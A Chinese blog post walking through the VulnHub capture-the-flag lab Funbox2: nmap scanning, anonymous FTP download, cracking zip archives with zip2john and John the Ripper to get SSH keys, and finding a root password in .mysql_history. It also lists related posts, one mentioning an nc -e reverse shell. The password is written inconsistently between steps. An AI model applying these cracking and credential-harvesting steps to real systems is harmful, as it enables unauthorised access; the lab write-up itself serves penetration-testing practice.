VulnHub靶机-Funbox2

最新推荐文章于 2024-02-22 13:56:35 发布
最新推荐文章于 2024-02-22 13:56:35 发布
阅读量465 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elg5127/article/details/133211994
版权

VulnHub靶机-Funbox2

靶机地址:https://download.vulnhub.com/funbox/Funbox2.ova

配置环境

攻击机-VMware-桥接(复制)-kali

靶机-VirtualBox-桥接-(网卡根据网络连接状态选择)#在非校园网,校园网会分配到不同的网段

ps.如果靶机开着的情况修改网络连接方式,是需要重启的!

请添加图片描述

信息搜集

nmap扫描
nmap -sS 172.20.10.0/24
#172.20.10.0是本机的网关
#nmap -sP 是。。。# /24是。。。
#sS比较好看

请添加图片描述

nmap -p22,80 -A 172.20.10.2
#看一下ssh,http端口

请添加图片描述

http有个robots.txt

http://172.20.10.2/robots.txt

一脸懵,f12也没什么东西,http这个方向先pass

ssh不知咋搞,先pass

FTP渗透

连接ftp:ftp匿名访问

ftp 172.20.10.2

user:anonymous passwd:空

ls -la

下载ftp的文件

wget -r ftp://172.20.10.2

join爆破
zip2john anna.zip > anna
……
john anna --wordlist=/usr/share/wordlists/rockyou.txt

tom.zip获得itom/iubire

cathrine获得cathrine/catwoman

以上为ssh用户的私钥

ssh公钥认证

cat .@users

说明keys在zip里面,解压zip

unzip cathrine.zip

解压cathrine.zip获得id_rsa

ssh -i id_rsa cathrine@172.20.10.2

登录失败

解压tom.zip获得id_rsa

ssh -i id_rsa tom@172.20.10.2

登录成功

尝试提权-利用mysql

先习惯性检查文件

注意到.mysql_history

cat .mysql_history

请添加图片描述

发现tom的密码是xx11yy22!

尝试提权

su root

xxqqyy22!

请添加图片描述

cd回到根目录

ls

cat flag.txt

请添加图片描述

成功啦~

总结:

1.信息搜集:nmap看ftp,ssh,http三大端口,走不通就换条路

nmap -sS 攻击机IP/24

2.ftp匿名登录:anonymous/空密码

ftp 靶机IP
anonymous/空

3.ftp文件下载:wget -r ftp://IP

wget -r ftp://IP

4.join爆破zip

zip2john A.zip > A
john A --wordlist=/usr/share/wordlists/rockyou.txt

5.ftp下载的文件好像都是用户信息,按照hint解压获得id_rsa

unzip A.zip

6.id_rsa用于登录ssh

ssh -i id_rsa A@靶机IP

7.尝试提权:mysql_history中有用户密码

ls -la
cat mysql_history
su root
输入密码
ls -la
cd回到根目录
cat flag.txt

Dem1
关注
Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
m0_68117643的博客
07-07 1237
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 686
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
FunBox系列FunBox_2
m0_74950307的博客
11-26 49
存在ftp,http,ssh
vulnhub靶机funbox 2
最新发布
J_linnb的博客
02-22 399
【代码】vulnhub靶机funbox 2。
靶机渗透练习23-Funbox2-Rookie
hirak0的博客
04-18 1654
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-rookie,520/ Description Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first. This VM is cre
Vulnhub-GoldenEye
m0_52016680的博客
09-18 494
Vulnhub类OSCP靶机
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 551
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub靶机实战--FunBox2:ROOKIE
m0_64312309的博客
09-21 462
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub--Funbox: Under Construction!
venu_s的博客
08-04 469
靶机介绍 Description: As always, it’s a very easy box for beginners. Download:https://www.vulnhub.com/entry/funbox-under-construction,715/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.177 目录扫描 gobuster dir -u http://19
Exp2 后门原理与实践
weixin_30799995的博客
03-23 127
1常用后门工具实践 1.1Windows获得Linux Shell 1.Windows:使用ipconfig指令查看本机IP: IP为172.20.10.2 再用ncat.exe程序监听本机的4308端口: 2.Kali:使用nc指令的-e选项反向连接Windows主机的4308端口: 3.Windows下成功运行Kali的shell,运行ls指令如下: 1...
靶机实战(4):Funbox: Rookie
OneMoreThink
01-01 1035
靶机官方:Funbox: Rookie[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞 422端口/SSH服务 9组件漏洞 9口令漏洞 10口令泄露 1080端口/HTTP服务 11组件漏洞 11URL漏洞(目录、文件) 12四、越权提权 15sudo 15suid 15信息收集 18sudo一、主机发现本次攻击指定IP,不涉...
深大计算机网络实验二——常用网络命令
AnakinRM的博客
03-02 986
实验目的与要求: 了解ping等常用网络工具的功能以及使用方法,并通过这些工具发现或者验证网络中的故障。 学习安装、使用协议分析软件,掌握基本的数据报捕获、过滤和协议的分析技巧。 实验过程及内容: 图1. 检测是否能发送ping到相应IP地址 输入ping 127.0.0.1,可检查TCP/IP的安装和运行是否有问题。 图2. 发送Ping命令到本机地址 发送Ping命令到本机地址,检查本地配置或安装是否出现问题。 ...
Vulnhub-Tr0ll
m0_52016680的博客
09-10 2035
Vulnhub类OSCP靶场渗透笔记
Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)
qq_44433172的博客
06-24 1299
Apache Log4j 远程代码执行漏洞 (CVE-2021-44228)
Windows--双路由永久配置内网、外网同时连接(wifi或手机热点)
JustinQin
08-05 1万+
目录 一、连接内外网 二、配置永久路由 1、查看内网IP 2、配置IPv4属性 3、配置永久路由 4、重连外网 因为在公司上班用的是内网,插的内网网线,插上之后,再连接外网(wifi或者热点)没法访问外网,只能上内网。 按照网上很多热门教程配置双路由,没有一个是生效的,自己研究了下,配置生效了。 一、连接内外网 插入内网USB端口、连接外网(wifi或热点),cmd打开命令窗 r...
2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
weixin_33748818的博客
04-15 413
- 2018-2019-2 20165206《网络攻防技术》Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模块。(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除...
unable to connect to 172.20.10.10:5555 解决办法
平常心的专栏
12-05 1万+
adb通过wifi调试Android设备,在连接过程中经常显示以下错误: unable to connect to 172.20.10.10:5555 解决办法 第一步:Android设备开启USB调试,并且通过USB线连接到电脑。 第二步:在终端执行以下命令”adb tcpip 5555“。 第三步:在终端执行以下命令”adb c
服务器获取请求ip地址
苍煜
12-21 7164
服务器获取请求id地址以及request.getRemoteAddr()的用法。
使用wireshark抓包软件分析微信协议--zucc
热门推荐
endless/若风 - 计算机软件
06-07 4万+
因为csdn自动压缩了上传的图片,导致看到的图片不太精确,稍后将发布可以下载的文档说明 下载地址,可以看到超清的图片,请自行下载 1.通过使用wireshark分析网络协议。 2.了解微信认证、聊天协议。 二、实验内容原理实验结果与分析 1.选择微信使用模式(微信App或者网页微信),合理配置网络环境。 【实验步骤】 使用mac进行wireshark抓包,并选择使用客户端微信,同时...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值